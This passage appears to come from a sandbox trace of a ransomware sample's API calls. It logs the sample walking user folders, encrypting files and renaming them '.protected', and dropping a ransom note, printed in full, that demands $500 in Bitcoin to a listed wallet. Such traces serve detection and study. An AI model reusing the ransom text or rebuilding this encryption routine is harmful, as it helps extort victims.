Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.125] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.126] lstrlenA (lpString="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") returned 684 [0095.126] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.126] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.126] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0095.126] CloseHandle (hObject=0xa4) returned 1 [0095.126] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.126] lstrcmpiW (lpString1="Documents", lpString2="Windows") returned -1 [0095.126] lstrcmpiW (lpString1="Documents", lpString2="Program Files") returned -1 [0095.126] lstrcmpiW (lpString1="Documents", lpString2="Program Files (x86)") returned -1 [0095.127] lstrcmpiW (lpString1="Documents", lpString2="$Recycle.bin") returned 1 [0095.127] lstrcmpiW (lpString1="Documents", lpString2="System Volume Information") returned -1 [0095.127] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents") returned 30 [0095.127] lstrcmpW (lpString1="Documents", lpString2=".") returned 1 [0095.127] lstrcmpW (lpString1="Documents", lpString2="..") returned 1 [0095.127] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\*") returned 32 [0095.127] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.127] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.127] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.127] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.128] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.128] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.128] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\.") returned 32 [0095.128] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.128] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.128] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.128] CryptGenRandom (in: 
hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.128] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.128] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\." (normalized: "c:\\users\\default\\documents\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.128] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.128] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.128] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.128] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.128] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.128] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.128] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\..") returned 33 [0095.128] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.128] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.128] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.128] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.128] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.128] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.128] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\.." 
(normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.128] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.128] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.129] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.129] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.129] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.129] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.129] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini") returned 42 [0095.129] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.129] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.129] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.129] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.129] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini" (normalized: "c:\\users\\default\\documents\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.129] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini") returned 42 [0095.129] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.130] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini") returned 42 [0095.130] StrStrW 
(lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.130] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini") returned 42 [0095.130] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.130] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x192, lpOverlapped=0x0) returned 1 [0095.131] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe6e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.131] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x192, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x192, lpOverlapped=0x0) returned 1 [0095.132] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.132] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.132] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.132] CloseHandle (hObject=0xb4) returned 1 [0095.132] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini.protected") returned 52 [0095.132] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini" (normalized: "c:\\users\\default\\documents\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini.protected" (normalized: "c:\\users\\default\\documents\\desktop.ini.protected")) returned 1 [0095.133] 
FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.133] lstrcmpiW (lpString1="My Music", lpString2="Windows") returned -1 [0095.133] lstrcmpiW (lpString1="My Music", lpString2="Program Files") returned -1 [0095.133] lstrcmpiW (lpString1="My Music", lpString2="Program Files (x86)") returned -1 [0095.134] lstrcmpiW (lpString1="My Music", lpString2="$Recycle.bin") returned 1 [0095.134] lstrcmpiW (lpString1="My Music", lpString2="System Volume Information") returned -1 [0095.134] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Music") returned 39 [0095.134] lstrcmpW (lpString1="My Music", lpString2=".") returned 1 [0095.134] lstrcmpW (lpString1="My Music", lpString2="..") returned 1 [0095.134] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Music\\*") returned 41 [0095.134] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Music\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0xffffffff [0095.134] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.134] lstrcmpiW (lpString1="My Pictures", lpString2="Windows") returned -1 [0095.134] lstrcmpiW (lpString1="My Pictures", lpString2="Program Files") returned -1 [0095.134] lstrcmpiW (lpString1="My Pictures", lpString2="Program Files (x86)") returned -1 [0095.134] lstrcmpiW (lpString1="My Pictures", lpString2="$Recycle.bin") returned 1 [0095.134] lstrcmpiW (lpString1="My Pictures", lpString2="System Volume Information") returned -1 [0095.134] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures") returned 42 [0095.134] lstrcmpW (lpString1="My Pictures", lpString2=".") returned 1 [0095.134] lstrcmpW (lpString1="My Pictures", 
lpString2="..") returned 1 [0095.134] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures\\*") returned 44 [0095.134] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0xffffffff [0095.134] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.134] lstrcmpiW (lpString1="My Videos", lpString2="Windows") returned -1 [0095.134] lstrcmpiW (lpString1="My Videos", lpString2="Program Files") returned -1 [0095.134] lstrcmpiW (lpString1="My Videos", lpString2="Program Files (x86)") returned -1 [0095.134] lstrcmpiW (lpString1="My Videos", lpString2="$Recycle.bin") returned 1 [0095.134] lstrcmpiW (lpString1="My Videos", lpString2="System Volume Information") returned -1 [0095.134] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Videos") returned 40 [0095.134] lstrcmpW (lpString1="My Videos", lpString2=".") returned 1 [0095.135] lstrcmpW (lpString1="My Videos", lpString2="..") returned 1 [0095.135] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Videos\\*") returned 42 [0095.135] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Videos\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0xffffffff [0095.135] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.135] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.135] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\RESTORE_FILES.txt") returned 48 [0095.135] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\RESTORE_FILES.txt" 
(normalized: "c:\\users\\default\\documents\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.136] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.136] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.136] lstrlenA (lpString="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") 
returned 684 [0095.136] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.137] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.137] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0095.137] CloseHandle (hObject=0xa4) returned 1 [0095.137] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.137] lstrcmpiW (lpString1="Downloads", lpString2="Windows") returned -1 [0095.137] lstrcmpiW (lpString1="Downloads", lpString2="Program Files") returned -1 [0095.137] lstrcmpiW (lpString1="Downloads", lpString2="Program Files (x86)") returned -1 [0095.137] lstrcmpiW (lpString1="Downloads", lpString2="$Recycle.bin") returned 1 [0095.137] lstrcmpiW (lpString1="Downloads", lpString2="System Volume Information") returned -1 [0095.137] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads") returned 30 [0095.137] lstrcmpW (lpString1="Downloads", lpString2=".") returned 1 [0095.137] lstrcmpW (lpString1="Downloads", lpString2="..") returned 1 [0095.137] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads\\*") returned 32 [0095.137] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.137] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.137] lstrcmpiW 
(lpString1=".", lpString2="Program Files") returned -1 [0095.137] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.137] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.138] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.138] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads\\.") returned 32 [0095.138] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.138] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.138] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.138] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.138] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.138] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\." 
(normalized: "c:\\users\\default\\downloads\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.138] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.138] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.138] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.138] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.138] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.138] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.138] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads\\..") returned 33 [0095.138] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.138] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.138] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.138] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.138] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.138] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.138] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\.." 
(normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.138] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.138] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.138] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.139] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.139] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.139] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.139] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini") returned 42 [0095.139] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.139] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.139] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.139] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.139] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini" (normalized: "c:\\users\\default\\downloads\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.139] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini") returned 42 [0095.139] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.139] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini") returned 42 [0095.140] StrStrW 
(lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.140] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini") returned 42 [0095.140] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.140] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x11a, lpOverlapped=0x0) returned 1 [0095.140] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffee6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.141] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x11a, lpOverlapped=0x0) returned 1 [0095.141] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.141] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.141] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.141] CloseHandle (hObject=0xb4) returned 1 [0095.141] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini.protected") returned 52 [0095.141] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini" (normalized: "c:\\users\\default\\downloads\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini.protected" (normalized: "c:\\users\\default\\downloads\\desktop.ini.protected")) returned 1 [0095.142] 
FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.142] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.142] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads\\RESTORE_FILES.txt") returned 48 [0095.142] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\downloads\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.143] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.143] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.143] lstrlenA (lpString="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") returned 684 [0095.143] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.144] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.144] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
